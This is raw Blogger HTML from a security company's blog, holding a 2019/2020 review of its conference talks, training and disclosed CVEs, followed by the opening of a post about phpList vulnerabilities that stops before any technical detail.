x_X</td></tr></tbody></table><p></p><p><br /><br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicrxRVbMYwmAfs19xrNZDeTn4dOLGEKqxMKc8GDytBFSbYw65GNr81nwuVSjexLbY223TD07YlIO8_U_ROtP83t475cYIhNLgI7Whxdn1Zwv27ZD-VuUdgBZ-OO7fPnS6Gp7S3GEHWRRHM/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="960" data-original-width="1280" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicrxRVbMYwmAfs19xrNZDeTn4dOLGEKqxMKc8GDytBFSbYw65GNr81nwuVSjexLbY223TD07YlIO8_U_ROtP83t475cYIhNLgI7Whxdn1Zwv27ZD-VuUdgBZ-OO7fPnS6Gp7S3GEHWRRHM/w640-h480/image.png" width="640" /></a></div><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjEYP5dWVRyOCCF6WVTnzJwcL-eETJKWeFQTpnvYNguJ8ySp8SPaVXkeBFfryMfiS6q2irSAVrgDXIUnBThJI0LPy-OBHZWW0RQeeVyWBQOMdZGqyo5WjVXTYcLg3gj34AnXE6Zu65LCHw/" style="margin-left: auto; margin-right: auto;"><img data-original-height="682" data-original-width="1024" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjEYP5dWVRyOCCF6WVTnzJwcL-eETJKWeFQTpnvYNguJ8ySp8SPaVXkeBFfryMfiS6q2irSAVrgDXIUnBThJI0LPy-OBHZWW0RQeeVyWBQOMdZGqyo5WjVXTYcLg3gj34AnXE6Zu65LCHw/w640-h426/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Thanks to all the trainers, organisers, volunteers and everyone that made DEFCON China 1.0 possible <3</td></tr></tbody></table><p></p><h2 style="text-align: left;">Training – Ethical Hacking 101</h2><p></p><div style="text-align: left;"><span style="font-size: large;">Right after China we were off to sunny Tel Aviv in Israel for BSides Tel Aviv where we were sponsors and also, gave our ethical hacking 101 training course. The local Israel hacking community are really awesome and a 100% of the proceeds of our training course were given back to be used by the local BSides TLV community. </span></div><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp3E7XZJXbo38duccccYcN0Van6TYEp3gSD2kUAz5nrm90b7BNQFmjLb2ahHpn7QiDOOr2PpdOrcqb69SrCiv5Ttf0ZpeJR-pqdiTH8Usi_JubuqrVSZWObcfuXOAZu3czSErEHZwQyEf1/" style="margin-left: auto; margin-right: auto;"><img data-original-height="786" data-original-width="1176" height="428" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp3E7XZJXbo38duccccYcN0Van6TYEp3gSD2kUAz5nrm90b7BNQFmjLb2ahHpn7QiDOOr2PpdOrcqb69SrCiv5Ttf0ZpeJR-pqdiTH8Usi_JubuqrVSZWObcfuXOAZu3czSErEHZwQyEf1/w640-h428/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Some cool art work on Aviv Beach</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp-MaZVDvAz1bKptmy7QA0eBeb10yEvdTmgZ3nk_oXd-00l0H7fDpLxiJE9FTLJPbp10HYND3e7C1ASTPW8P-ezGzKcGb52rBC8o6xj9LhMFJYXCG2NM6D7OA-T397OcFFmPUZfLK_yC6Q/" style="margin-left: auto; margin-right: auto;"><img data-original-height="744" data-original-width="1030" height="462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp-MaZVDvAz1bKptmy7QA0eBeb10yEvdTmgZ3nk_oXd-00l0H7fDpLxiJE9FTLJPbp10HYND3e7C1ASTPW8P-ezGzKcGb52rBC8o6xj9LhMFJYXCG2NM6D7OA-T397OcFFmPUZfLK_yC6Q/w640-h462/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Raul (left) and Manny (right), ready to present to the community</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2_1S6XoP5deeQ_SdDaO5zwpufaewSJGpTk0cZB_CC5QTwpczCxG86YpESWhpXm3ZATkc7N4tXYRcnFoq4ZRjbBK9Vub1XVuEgA0pUYbv_s9tE2ZrXDGKr_QevBI9ESh4bQBHGDIL_QK29/" style="margin-left: auto; margin-right: auto;"><img data-original-height="788" data-original-width="1206" height="418" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2_1S6XoP5deeQ_SdDaO5zwpufaewSJGpTk0cZB_CC5QTwpczCxG86YpESWhpXm3ZATkc7N4tXYRcnFoq4ZRjbBK9Vub1XVuEgA0pUYbv_s9tE2ZrXDGKr_QevBI9ESh4bQBHGDIL_QK29/w640-h418/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Packed house for the kick off of BSides TLV 2019</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjidtbFILbLeJr7zB3PA8-CrA_Ez5rmA1kbbCxnbysOk9bBapO624b8vwnUfDI1D7mKegnWTGWL56lRiMRzRJUl4jEiqtSqdU3274KR3gspiaTU2cf69R7EbQHzrotg0xDIPABLFUPKsOr/" style="margin-left: auto; margin-right: auto;"><img data-original-height="1280" data-original-width="960" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjidtbFILbLeJr7zB3PA8-CrA_Ez5rmA1kbbCxnbysOk9bBapO624b8vwnUfDI1D7mKegnWTGWL56lRiMRzRJUl4jEiqtSqdU3274KR3gspiaTU2cf69R7EbQHzrotg0xDIPABLFUPKsOr/w300-h400/image.png" width="300" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Aaaaaaaaaaaaaaaaaaaand guess where we are now, VEGAAAAAAS!</td></tr></tbody></table><br /><br /><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKTy70qRv8MzTIUeuBoiEMeYsa2z5EpQyg1x-L3lOOJfMfbw4QRBl0R15ekR4j6wrABNYskElEMZFp4kfh5xsNu8rDtoC9wSihqKZetMsvny8yiwImCXMeLIewnljkgwUoHdVw15CoUG1z/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="1280" data-original-width="720" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKTy70qRv8MzTIUeuBoiEMeYsa2z5EpQyg1x-L3lOOJfMfbw4QRBl0R15ekR4j6wrABNYskElEMZFp4kfh5xsNu8rDtoC9wSihqKZetMsvny8yiwImCXMeLIewnljkgwUoHdVw15CoUG1z/w225-h400/image.png" width="225" /></a></div><div><br /></div><div><br /></div><div><span style="font-size: large;">Here we gave our Hack to Basics training for our DEF CON workshop, got to catch up with old friends, make new friends, nothing else like DEF CON Vegas!</span></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL8d1JWQO3AXvGtnsn2GeAEMi2pbRaYqtsT407X2UqKwmSwpvCF_TmmTuNXefED7PrUgwVrdF7m_D6fbGTh_3bzQuFTG69PX1Qhx24_7N8jAMgcAFGX-vVkTieXmuKMCQ3QSAudfrQUIo1/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="428" data-original-width="853" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL8d1JWQO3AXvGtnsn2GeAEMi2pbRaYqtsT407X2UqKwmSwpvCF_TmmTuNXefED7PrUgwVrdF7m_D6fbGTh_3bzQuFTG69PX1Qhx24_7N8jAMgcAFGX-vVkTieXmuKMCQ3QSAudfrQUIo1/w640-h322/image.png" width="640" /></a></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnScijpsaIiFPsJR3PNBBqNcd9LmOZNUZoWfdTg1VYE9pJTtVnGGsD1Mb0fenH5-F34g_FyVrvI00SeXXDq_KWNW-zvTsaWeWCtPFwvULTrXWzuVAAh2Ol6kqAad1RE3TsNZv1uEEu8BvG/s662/2.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="499" data-original-width="662" height="482" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnScijpsaIiFPsJR3PNBBqNcd9LmOZNUZoWfdTg1VYE9pJTtVnGGsD1Mb0fenH5-F34g_FyVrvI00SeXXDq_KWNW-zvTsaWeWCtPFwvULTrXWzuVAAh2Ol6kqAad1RE3TsNZv1uEEu8BvG/w640-h482/2.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"> Students from one of our classes (the ones that wanted to be in the picture that is!).</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihYWyvjryPtjKAUVxiwM-3bDIqbhv6h1zcw3MqBa2KXao1aR_aBUi_ef2k9TZVmNRnclHpo6ratoU9oKU0eLieM5F5nBVKO2Pw7NdT9LtGTpV0T3RVkR8dTnjv5_tZI6gkKpSPL4dTLWiw/" style="margin-left: auto; margin-right: auto;"><img data-original-height="1280" data-original-width="720" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihYWyvjryPtjKAUVxiwM-3bDIqbhv6h1zcw3MqBa2KXao1aR_aBUi_ef2k9TZVmNRnclHpo6ratoU9oKU0eLieM5F5nBVKO2Pw7NdT9LtGTpV0T3RVkR8dTnjv5_tZI6gkKpSPL4dTLWiw/w225-h400/image.png" width="225" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">#TheBadgeLife – we got to have them all (or at least some!).<br /><br /></td></tr></tbody></table><span style="text-align: center;"><span> </span></span><p></p><h2 style="text-align: left;">Back to the Motherland</h2><p></p><div style="text-align: left;"><span style="font-size: large;">Telspace has always been very close to the local (South African) infosec community and we believe in giving back. In line with this, we started / established the DC2711 group in South Africa and had our first conference last year on the 5th of October 2019. The conference was completely FREE to attend (for the community) and allowed various international and local researchers to share their research, for a full list of who spoke, refer to <a href="https://www.dc2711.co.za/dc2711_Presentations.html">https://www.dc2711.co.za/dc2711_Presentations.html</a>. Attendees also got swag packs full of DC2711 goodies.</span></div><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtCFERsKR2LMlUm5DXg0uZ-p9Z3-aI6Pt2GO2k-psG__vTCjmU_UdGm6tukoYnO87jZjhIbCmlL4p8XCNM3XTh-tewaot6nKTjxHEp2GlEC0Jia4HngAU2s_GW5nXguO0I3sZJI7tlQfne/" style="margin-left: auto; margin-right: auto;"><img data-original-height="546" data-original-width="971" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtCFERsKR2LMlUm5DXg0uZ-p9Z3-aI6Pt2GO2k-psG__vTCjmU_UdGm6tukoYnO87jZjhIbCmlL4p8XCNM3XTh-tewaot6nKTjxHEp2GlEC0Jia4HngAU2s_GW5nXguO0I3sZJI7tlQfne/w640-h360/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Jayson Street handing Dino the official DEF CON flag for the DC2711 Group</td></tr></tbody></table><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEJU-HGO38WDrx4DS3WuZSip2Gmz1_ZQaGx4bcx3vZ-qIUdrfmmugoM21bWgKjzIAtf7cGCn-qpjBOVwdEfZekAjwl3PJ7rHc4CTpFvVJ5Lvt_dXlpTLm8TNsoYyB9pc5HJSV2JIfsaUPK/" style="margin-left: auto; margin-right: auto;"><img data-original-height="287" data-original-width="991" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEJU-HGO38WDrx4DS3WuZSip2Gmz1_ZQaGx4bcx3vZ-qIUdrfmmugoM21bWgKjzIAtf7cGCn-qpjBOVwdEfZekAjwl3PJ7rHc4CTpFvVJ5Lvt_dXlpTLm8TNsoYyB9pc5HJSV2JIfsaUPK/w640-h186/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">The official DC2711 sticker but more importantly, a coffeeeeee voucher :D</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR6eHERKnFQrWiUgVvfYadtPkfpRyZNMmO1rok7Cmel4GvvBEiH4Wy1GHuiJkXLZlhNxfhqh_nnhfMLnt3va05ZQXiNkMYtQ3T2w550KYHTmEBkHMtbouHQoCd-aiCRZj2CygGsxNT1IR9/" style="margin-left: auto; margin-right: auto;"><img data-original-height="620" data-original-width="860" height="462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR6eHERKnFQrWiUgVvfYadtPkfpRyZNMmO1rok7Cmel4GvvBEiH4Wy1GHuiJkXLZlhNxfhqh_nnhfMLnt3va05ZQXiNkMYtQ3T2w550KYHTmEBkHMtbouHQoCd-aiCRZj2CygGsxNT1IR9/w640-h462/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">DC2711 Badges</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU5SPdpiJmNk4Pxpa_MeAzYxKu3zwv1rS_lE4A7Bl9DoQ5dTLpIg0ehkk6_pulYsUVxPe1q3lf7XfmPDEOw7VSMlbeZDquqyaG62u1y7G4-Ikx3wItZfDllBKv9pTRhfDoS1CXE-vOD2hF/" style="margin-left: auto; margin-right: auto;"><img data-original-height="1536" data-original-width="2048" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU5SPdpiJmNk4Pxpa_MeAzYxKu3zwv1rS_lE4A7Bl9DoQ5dTLpIg0ehkk6_pulYsUVxPe1q3lf7XfmPDEOw7VSMlbeZDquqyaG62u1y7G4-Ikx3wItZfDllBKv9pTRhfDoS1CXE-vOD2hF/w640-h480/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Some official swag :D</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Aer0Q0H-mTvlrZdfqhqYgp-aMH7ivHCjSyYJPYIWHtkbaFRqzu944oR9mFWU5mpApqwShpBQ5R8Xmw4sSdVRzr8SG056ctPLJTWSEfzsEC_-4uQiwEA9mi8q3K0UJH_Ha-fIScnWvPFs/" style="margin-left: auto; margin-right: auto;"><img data-original-height="1536" data-original-width="2048" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Aer0Q0H-mTvlrZdfqhqYgp-aMH7ivHCjSyYJPYIWHtkbaFRqzu944oR9mFWU5mpApqwShpBQ5R8Xmw4sSdVRzr8SG056ctPLJTWSEfzsEC_-4uQiwEA9mi8q3K0UJH_Ha-fIScnWvPFs/w640-h480/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Dino and Manny with their fun faces on :P</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjqi38Ja3o3cIqlOSCSJwwUxUSPns96ZlYzXnWX0bfBBgPW-P4kZHGiy40eif-OnvpRqqfFgZxUVBqIT3PDsVNjURqf4zgUtxK3x_42W_y9dmXamFw0KBlkiLIlcAnFXAi7FJO6hEowVa-/" style="margin-left: auto; margin-right: auto;"><img data-original-height="676" data-original-width="1024" height="422" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjqi38Ja3o3cIqlOSCSJwwUxUSPns96ZlYzXnWX0bfBBgPW-P4kZHGiy40eif-OnvpRqqfFgZxUVBqIT3PDsVNjURqf4zgUtxK3x_42W_y9dmXamFw0KBlkiLIlcAnFXAi7FJO6hEowVa-/w640-h422/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">#DuckArmyInvasion</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAsSf88GHG2g03vFWrV9wukXt0fMXi4DGLZQeZigD9zqH5pHC3DXbUToL9Mql2pvF4Mdby-rn7OzZNLgcBJ_oF3uRZjMs2bdtsCH8g1AELzLmGDnnbgoMDmDygLGgcgpoYPjxcrUJDpHOk/" style="margin-left: auto; margin-right: auto;"><img data-original-height="1271" data-original-width="2048" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAsSf88GHG2g03vFWrV9wukXt0fMXi4DGLZQeZigD9zqH5pHC3DXbUToL9Mql2pvF4Mdby-rn7OzZNLgcBJ_oF3uRZjMs2bdtsCH8g1AELzLmGDnnbgoMDmDygLGgcgpoYPjxcrUJDpHOk/w640-h398/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">The core GOON team for DC2711 – thank you again!</td></tr></tbody></table><br /><br /><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV-VgTdCJYfw76BL38-Utp2btSP67CkLoOIRbrag_WlZqtqD2Oes38uFfPB1-usXtHWEn37_QDzsUNbNXWRRwG6FglFjkUJ4-KT2DfOfKXJW3SBU6y-ApWP7-61fY3tq1i-n_6aVkuoh-2/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="145" data-original-width="392" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV-VgTdCJYfw76BL38-Utp2btSP67CkLoOIRbrag_WlZqtqD2Oes38uFfPB1-usXtHWEn37_QDzsUNbNXWRRwG6FglFjkUJ4-KT2DfOfKXJW3SBU6y-ApWP7-61fY3tq1i-n_6aVkuoh-2/w400-h148/image.png" width="400" /></a></div><br /><span style="font-size: large;">We were also Gold Sponsors of BSides Cape Town 2019 and Amy’s talk was also accepted (this talk was first completed at DC2711)!</span><div><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_zi3HMfYTTdvJJ8ZK3YuqxrkiPz0QHf-5RxXJtVnO43LmLD722YA8JHphl3dlBF39PE9maGydG5sx3SwwwaMejxXVq8D7Pl3mJPKasRZDEnZr7CXehBtNpDKTobzYcIrBiLddv8Q6GpWV/" style="margin-left: auto; margin-right: auto;"><img data-original-height="546" data-original-width="971" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_zi3HMfYTTdvJJ8ZK3YuqxrkiPz0QHf-5RxXJtVnO43LmLD722YA8JHphl3dlBF39PE9maGydG5sx3SwwwaMejxXVq8D7Pl3mJPKasRZDEnZr7CXehBtNpDKTobzYcIrBiLddv8Q6GpWV/w640-h360/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">On our way to BSides Cape Town!!!!!</td></tr></tbody></table><br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVjvB0D22SWpZyo2KmJ7bpfNISR8jT_48uP7gi83gnKAO6CLw2C9I508d06U0mh2QE2Kd7Yka0OXtZcPfSC9EQYgUoDX3qhkC5tDuSbsTJnUqaet91wIyMPfnzvo-cgX_SL_zYv6WmrAw8/" style="margin-left: auto; margin-right: auto;"><img data-original-height="546" data-original-width="971" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVjvB0D22SWpZyo2KmJ7bpfNISR8jT_48uP7gi83gnKAO6CLw2C9I508d06U0mh2QE2Kd7Yka0OXtZcPfSC9EQYgUoDX3qhkC5tDuSbsTJnUqaet91wIyMPfnzvo-cgX_SL_zYv6WmrAw8/w640-h360/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Amy Manià giving her talk “Put words in my mouth” although we all know it as the “deep throat” talk.</td></tr></tbody></table><br /><span style="font-size: large;">Amy’s talk is accessible online at <a href="https://www.youtube.com/watch?v=4R-g90lplco">https://www.youtube.com/watch?v=4R-g90lplco</a>. </span></div><div><br /></div><div><h2 style="text-align: left;">Research / Dropping them 0days</h2><p></p><p><span style="font-size: large;">In 2019 and 2020 we discovered and reported on a number of vulnerabilities, some of the main ones being:</span></p><p></p><ul style="text-align: left;"><li><span style="font-size: large;">QNAP - CVE-2019-7181 (<a href="https://www.qnap.com/en/security-advisory/nas-201905-09">https://www.qnap.com/en/security-advisory/nas-201905-09</a>)</span></li><li><span style="font-size: large;">phpList – CVE-2020-15072 & CVE-2020-15073 (<a href="https://blog.telspace.co.za/2020/07/phplist-cve-2020-15072-cve-2020-15073.html">https://blog.telspace.co.za/2020/07/phplist-cve-2020-15072-cve-2020-15073.html</a>)</span></li><li><span style="font-size: large;">Pi-hole Code Injection – CVE-2020-14971 (<a href="https://blog.telspace.co.za/2020/06/pi-hole-code-injection-cve-2020-14971.html">https://blog.telspace.co.za/2020/06/pi-hole-code-injection-cve-2020-14971.html</a>)</span></li></ul><p></p><p><span style="font-size: large;">We also released a tool called Travesty, which is a directory and file enumeration tool (post exploitation). This can be downloaded at <a href="https://github.com/telspacesystems/travesty">https://github.com/telspacesystems/travesty</a> .</span></p><p><span style="font-size: large;">For additional information on these and others we released / published this year refer to <a href="https://blog.telspace.co.za/">https://blog.telspace.co.za/</a> </span></p><p><span style="font-size: large;">During DEF CON Safe Mode (DC28) Greg, Amy and Derek presented at the “War Story Bunker” event (Friday 7th August 2020), which was a pentesting story that caused a lot of big laughs and surprised faces – unfortunately these are not recorded for various reasons, but more information about DC28 can be found at <a href="https://www.defcon.org/html/defcon-safemode/dc-safemode-schedule.html">https://www.defcon.org/html/defcon-safemode/dc-safemode-schedule.html</a> .</span></p><p><span style="font-size: large;">Amy Mania also represented Telspace during a Woven Experiences podcast with Melissa Monnig, the interview can be listened to on Spotify at:</span></p><p></p><ul style="text-align: left;"><li><span style="font-size: large;"><a href="https://open.spotify.com/episode/4Co0Vo6xW3sziq77aWBa0Z?si=w_13wOjZRLyU1XvMGQHJNw">https://open.spotify.com/episode/4Co0Vo6xW3sziq77aWBa0Z?si=w_13wOjZRLyU1XvMGQHJNw</a> .</span></li></ul><p></p><p><span style="font-size: large;">Throughout the year we also participated in other local and international conferences, round table events and provided comments on news stories in the media.</span></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMXcYJtMwjVsHfIZh-TPfLxgF7fxz5k0fC2KEBwU70vb6wL10nELJe0NdngpzonP8wNc-No1iEq9qAenYNbtZ3osNDpHSaJ6laCt67AC12oBry0hWA0-2VIBWXEVMl7-dPbMFYI1JhrvWe/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="330" data-original-width="1134" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMXcYJtMwjVsHfIZh-TPfLxgF7fxz5k0fC2KEBwU70vb6wL10nELJe0NdngpzonP8wNc-No1iEq9qAenYNbtZ3osNDpHSaJ6laCt67AC12oBry0hWA0-2VIBWXEVMl7-dPbMFYI1JhrvWe/w640-h186/image.png" width="640" /></a></div><br /><p></p><div><span style="font-size: large;">Last but not least, our CEO and Founder (Dino Covotsos) is officially part of the DEF CON Review board (Talks and Workshops). This is a great achievement, in particular, representing South Africa at such an international level. More information can be found at: https://www.defcon.org/html/defcon-27/dc-27-cfp-review-board.html <br />In closing, we would like to thank everyone who made our 2019/2020 so amazing, a huge thank you to our staff, clients, employees, friends and most importantly the local and international Information Security community. <br />We wish you all the best and a prosperous year for 2021.</span></div></div><br />break2fixhttp://www.blogger.com/profile/06040620743029387401noreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-63494697990710975502020-07-09T11:06:00.000+02:002020-07-22T11:54:43.225+02:00phpList – CVE-2020-15072 & CVE-2020-15073 – Story Time<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">phpList is currently used in 73 countries and is a popular choice for sending email newsletters, marketing campaigns and announcements. It is accessible via web browsers and is Open Source (<a href="https://www.phplist.org/" style="color: purple; text-decoration: underline;">https://www.phplist.org</a>), however a paid for version also exists as a service via <a href="https://www.phplist.com/" style="color: purple; text-decoration: underline;">https://www.phplist.com</a>.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">Given its wide use / adoption, I decided to take a look at phpList recently, in order to give back to the Open Source community. <o:p></o:p></span></span></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">I would also like to give credit to phpList for responding and patching very quickly, especially to Suela at phpList. A new version of the application is now available for download.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">You can browse all the fixes, comments and patching by going to the following URLs:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
